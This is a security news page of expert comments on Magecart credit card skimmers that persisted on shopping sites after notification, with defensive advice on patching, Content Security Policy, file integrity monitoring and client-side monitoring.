Experts Reaction On Credit Card Skimmer Running On 13 Shopping Sites, Despite Notification

In a blog post today, researchers published the dates for nearly 40 new shopping websites infected by Magecart 12 with JavaScript. All were notified of the compromise, yet 13 continued to load the malicious JavaScript.

Experts Comments

February 26, 2020
Tarik Saleh
Senior Security Engineer and Malware Researcher
DomainTools
Magecart continues to be a successful Javascript based malware that steals customer payment information. Magecart is uploaded to your website only after it has been compromised via some other means, like a XSS (Cross-Site Scripting) vulnerability or an RCE (Remote Code Execution) exploit. With that in mind, If you own a business that handles customer credit cards or payment information there are several things you can do to detect and prevent Magecart from affecting you. The most clear.....Read More
Magecart continues to be a successful Javascript based malware that steals customer payment information. Magecart is uploaded to your website only after it has been compromised via some other means, like a XSS (Cross-Site Scripting) vulnerability or an RCE (Remote Code Execution) exploit. With that in mind, If you own a business that handles customer credit cards or payment information there are several things you can do to detect and prevent Magecart from affecting you. The most clear and obvious is ensuring your operating system and web framework’s used by your public facing website are fully patched. This will help prevent common exploits that may be affecting versions used by your website. Secondly, it’s important to adjust your web application’s Content Security Policy (CSP) to allow scripts running on it to be from your specific whitelisted domains. Thirdly, I recommend deploying a File Integrity Monitoring (FIM) solution to your website’s directory containing the scripts used for the checkout or payment handling process. FIM solutions are great for monitoring when files have been tampered with or added to your website, and in this case it won’t prevent you from being compromised but it will let you know if Magecart has been installed.  Read Less
February 26, 2020
Ameet Naik
Security Evangelist
PerimeterX
Businesses often leverage third-party platforms and services to take their brands online. When a Magecart infection is discovered, they can lack the processes or resources to engage their third-party vendors to patch their e-commerce stores and mitigate their risk of a data breach. PerimeterX research shows that Magecart attacks often remain active on websites for weeks or even months, compromising hundreds of thousands of credit card numbers in the process. Magecart activity is approaching.....Read More
Businesses often leverage third-party platforms and services to take their brands online. When a Magecart infection is discovered, they can lack the processes or resources to engage their third-party vendors to patch their e-commerce stores and mitigate their risk of a data breach. PerimeterX research shows that Magecart attacks often remain active on websites for weeks or even months, compromising hundreds of thousands of credit card numbers in the process. Magecart activity is approaching fever pitch as attack techniques and tools are widely shared amongst hackers. PerimeterX researchers continue to uncover new Magecart infections, and multiple simultaneous infections in some cases. Despite proactive notifications to the site administrators, we see the infections continue to persist for months. While it helps to stay current with security patches and software updates, businesses need to invest in client-side visibility solutions that will proactively alert them about Magecart attacks, and drastically shorten the mean time to mitigation.  Read Less
What do you think of the topic? Do you agree with expert(s) or share your expert opinion below.
Be part of our growing Information Security Expert Community (1000+), please register here.